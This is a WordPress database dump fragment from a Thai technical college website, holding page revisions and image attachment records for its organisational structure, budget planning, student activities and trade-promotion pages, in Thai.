(1756, 3, '2018-03-12 14:56:21', '2018-03-12 07:56:21', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1631 \" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-06.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1632 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" /></a>\r\n\r\n<a href=\"/งานวางแผนและความร่วมมื\"><img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27.jpg\" alt=\"\" width=\"375\" height=\"102\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1656\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2018-03-12 14:56:21', '2018-03-12 07:56:21', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(1757, 3, '2018-03-12 14:58:06', '2018-03-12 07:58:06', '<img class=\"size-full wp-image-1652 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" /><img class=\"wp-image-1650 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"wp-image-1755 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<a href=\"http://incubator.technicrayong.ac.th/portal.php\"><img class=\"aligncenter wp-image-3523 size-full\" src=\"/wp-content/uploads/2018/07/24-7-2561-9-59-35.jpg\" alt=\"\" width=\"983\" height=\"244\" /></a>\r\n\r\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3443\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg\" alt=\"\" width=\"78\" height=\"93\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\n \r\n\r\n \r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%9c%e0%b8%a5%e0%b8%b4%e0%b8%95%e0%b8%9c%e0%b8%a5-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b9%89', '', '', '2018-07-24 11:07:26', '2018-07-24 04:07:26', '', 0, 'http://www.technicrayong.ac.th/?page_id=1757', 0, 'page', '', 0),
(1758, 3, '2018-03-12 14:58:06', '2018-03-12 07:58:06', '<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-03-12 14:58:06', '2018-03-12 07:58:06', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
(1761, 3, '2018-03-13 10:13:54', '2018-03-13 03:13:54', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></a></h4>\r\n<h4><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h4>\r\n<h4><a href=\"/รายงานผลการปฏิบัติงานต\"><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></a></h4>\r\n<h4><a href=\"/ปฏิทินปฏิบัติงาน\"><span style=\"color: #008000;\">** ปฏิทินปฏิบัติงาน</span></a></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและงบประมาณ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-13 10:13:54', '2018-03-13 03:13:54', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1762, 3, '2018-03-13 12:08:46', '2018-03-13 05:08:46', '<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-6200\" src=\"/wp-content/uploads/2019/10/10-1-2562-9-00-17.png\" alt=\"\" width=\"194\" height=\"248\" /></p>\r\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-6204\" src=\"/wp-content/uploads/2019/10/10-1-2562-9-01-10-2.png\" alt=\"\" width=\"606\" height=\"157\" /></p>\r\n \r\n\r\n<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3397\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-56-29.jpg\" alt=\"\" width=\"735\" height=\"324\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1772\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1773\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-17-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1774 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-09.jpg\" alt=\"\" width=\"265\" height=\"326\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1769\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-47.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1770\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1771 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-11-58.jpg\" alt=\"\" width=\"824\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3400\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-01-05.jpg\" alt=\"\" width=\"439\" height=\"329\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1793\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-47.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1794\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-19-24-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1795 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-27-05.jpg\" alt=\"\" width=\"494\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1778\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1779\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3403\" src=\"/wp-content/uploads/2018/07/10-7-2561-11-07-53.jpg\" alt=\"\" width=\"486\" height=\"324\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81-2', '', '', '2019-10-07 10:10:10', '2019-10-07 03:10:10', '', 0, 'http://www.technicrayong.ac.th/?page_id=1762', 0, 'page', '', 0),
(1764, 3, '2018-03-13 11:57:43', '2018-03-13 04:57:43', '', '13-3-2561 11-07-01', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-07-01', '', '', '2018-03-13 11:57:43', '2018-03-13 04:57:43', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-07-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(1765, 3, '2018-03-13 11:59:01', '2018-03-13 04:59:01', '', '13-3-2561 12-00-36', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-00-36', '', '', '2018-03-13 11:59:01', '2018-03-13 04:59:01', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-00-36.jpg', 0, 'attachment', 'image/jpeg', 0),
(1766, 3, '2018-03-13 12:01:49', '2018-03-13 05:01:49', '', '13-3-2561 12-01-14', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-01-14', '', '', '2018-03-13 12:01:49', '2018-03-13 05:01:49', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(1767, 3, '2018-03-13 12:01:53', '2018-03-13 05:01:53', '', '13-3-2561 11-07-18', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-07-18', '', '', '2018-03-13 12:01:53', '2018-03-13 05:01:53', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-07-18.jpg', 0, 'attachment', 'image/jpeg', 0),
(1768, 3, '2018-03-13 12:01:57', '2018-03-13 05:01:57', '', '13-3-2561 11-06-24', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-06-24', '', '', '2018-03-13 12:01:57', '2018-03-13 05:01:57', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-06-24.jpg', 0, 'attachment', 'image/jpeg', 0),
(1769, 3, '2018-03-13 12:02:00', '2018-03-13 05:02:00', '', '13-3-2561 12-01-47', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-01-47', '', '', '2018-03-13 12:02:00', '2018-03-13 05:02:00', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-01-47.jpg', 0, 'attachment', 'image/jpeg', 0),
(1770, 3, '2018-03-13 12:02:04', '2018-03-13 05:02:04', '', '13-3-2561 11-09-38', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-09-38', '', '', '2018-03-13 12:02:04', '2018-03-13 05:02:04', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-09-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(1771, 3, '2018-03-13 12:02:07', '2018-03-13 05:02:07', '', '13-3-2561 11-11-58', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-11-58', '', '', '2018-03-13 12:02:07', '2018-03-13 05:02:07', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-11-58.jpg', 0, 'attachment', 'image/jpeg', 0),
(1772, 3, '2018-03-13 12:02:12', '2018-03-13 05:02:12', '', '13-3-2561 12-01-31', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-01-31', '', '', '2018-03-13 12:02:12', '2018-03-13 05:02:12', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-01-31.jpg', 0, 'attachment', 'image/jpeg', 0),
(1773, 3, '2018-03-13 12:02:15', '2018-03-13 05:02:15', '', '13-3-2561 11-09-17', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-09-17', '', '', '2018-03-13 12:02:15', '2018-03-13 05:02:15', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-09-17.jpg', 0, 'attachment', 'image/jpeg', 0),
(1774, 3, '2018-03-13 12:02:19', '2018-03-13 05:02:19', '', '13-3-2561 11-06-09', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-06-09', '', '', '2018-03-13 12:02:19', '2018-03-13 05:02:19', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-06-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(1775, 3, '2018-03-13 12:02:20', '2018-03-13 05:02:20', '', '13-3-2561 12-02-32', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-02-32', '', '', '2018-03-13 12:02:20', '2018-03-13 05:02:20', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg', 0, 'attachment', 'image/jpeg', 0),
(1776, 3, '2018-03-13 12:02:22', '2018-03-13 05:02:22', '', '13-3-2561 11-12-21', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-12-21', '', '', '2018-03-13 12:02:22', '2018-03-13 05:02:22', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-12-21.jpg', 0, 'attachment', 'image/jpeg', 0),
(1777, 3, '2018-03-13 12:02:23', '2018-03-13 05:02:23', '', '13-3-2561 11-18-49', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-18-49', '', '', '2018-03-13 12:02:23', '2018-03-13 05:02:23', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-18-49.jpg', 0, 'attachment', 'image/jpeg', 0),
(1778, 3, '2018-03-13 12:02:25', '2018-03-13 05:02:25', '', '13-3-2561 12-03-05', '', 'inherit', 'closed', 'closed', '', '13-3-2561-12-03-05', '', '', '2018-03-13 12:02:25', '2018-03-13 05:02:25', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-12-03-05.jpg', 0, 'attachment', 'image/jpeg', 0),
(1779, 3, '2018-03-13 12:02:26', '2018-03-13 05:02:26', '', '13-3-2561 11-28-10', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-28-10', '', '', '2018-03-13 12:02:26', '2018-03-13 05:02:26', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-28-10.jpg', 0, 'attachment', 'image/jpeg', 0),
(1780, 3, '2018-03-13 12:02:36', '2018-03-13 05:02:36', '', '13-3-2561 11-32-42', '', 'inherit', 'closed', 'closed', '', '13-3-2561-11-32-42', '', '', '2018-03-13 12:02:36', '2018-03-13 05:02:36', '', 1762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/13-3-2561-11-32-42.jpg', 0, 'attachment', 'image/jpeg', 0),
(1781, 3, '2018-03-13 12:08:46', '2018-03-13 05:08:46', '<img class=\"aligncenter size-full wp-image-1765\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-00-36.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1764\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-01-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1768 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-24.jpg\" alt=\"\" width=\"489\" height=\"317\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1772\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-31.jpg\" alt=\"\" width=\"193\" height=\"240\" />\r\n\r\n<img class=\"aligncenter wp-image-1773\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-17-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1774 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-09.jpg\" alt=\"\" width=\"265\" height=\"326\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1769\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-47.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1770\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-09-38-300x82.jpg\" alt=\"\" width=\"376\" height=\"103\" />\r\n\r\n<img class=\"aligncenter wp-image-1771 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-11-58.jpg\" alt=\"\" width=\"824\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1775\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-02-32.jpg\" alt=\"\" width=\"194\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1776\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-12-21-300x83.jpg\" alt=\"\" width=\"376\" height=\"104\" />\r\n\r\n<img class=\"aligncenter wp-image-1777 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-18-49.jpg\" alt=\"\" width=\"659\" height=\"315\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1778\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-03-05.jpg\" alt=\"\" width=\"192\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1779\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-28-10-300x85.jpg\" alt=\"\" width=\"376\" height=\"106\" />\r\n\r\n<img class=\"aligncenter wp-image-1780 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-32-42.jpg\" alt=\"\" width=\"478\" height=\"323\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายพัฒนากิจการนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1762-revision-v1', '', '', '2018-03-13 12:08:46', '2018-03-13 05:08:46', '', 1762, 'http://www.technicrayong.ac.th/1762-revision-v1/', 0, 'revision', '', 0),
(1784, 3, '2018-03-13 13:22:45', '2018-03-13 06:22:45', '<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3448\" src=\"/wp-content/uploads/2018/07/16-7-2561-10-54-02.jpg\" alt=\"\" width=\"687\" height=\"324\" />\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์ม บันทึกข้อความขอดำเนินโครงการ >> <span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.pdf\">ไฟล์ PDF</a></span><< >><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.docx\"><span style=\"color: #ff0000;\">ไฟล์ Word</span><<</a></span></h3>', 'งานกิจกรรมนักเรียน นักศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8', '', '', '2018-07-16 11:03:26', '2018-07-16 04:03:26', '', 0, 'http://www.technicrayong.ac.th/?page_id=1784', 0, 'page', '', 0),
(1785, 3, '2018-03-13 13:22:45', '2018-03-13 06:22:45', '<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1768 size-full\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-06-24.jpg\" alt=\"\" width=\"489\" height=\"317\" />', 'งานกิจกรรมนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1784-revision-v1', '', '', '2018-03-13 13:22:45', '2018-03-13 06:22:45', '', 1784, 'http://www.technicrayong.ac.th/1784-revision-v1/', 0, 'revision', '', 0),
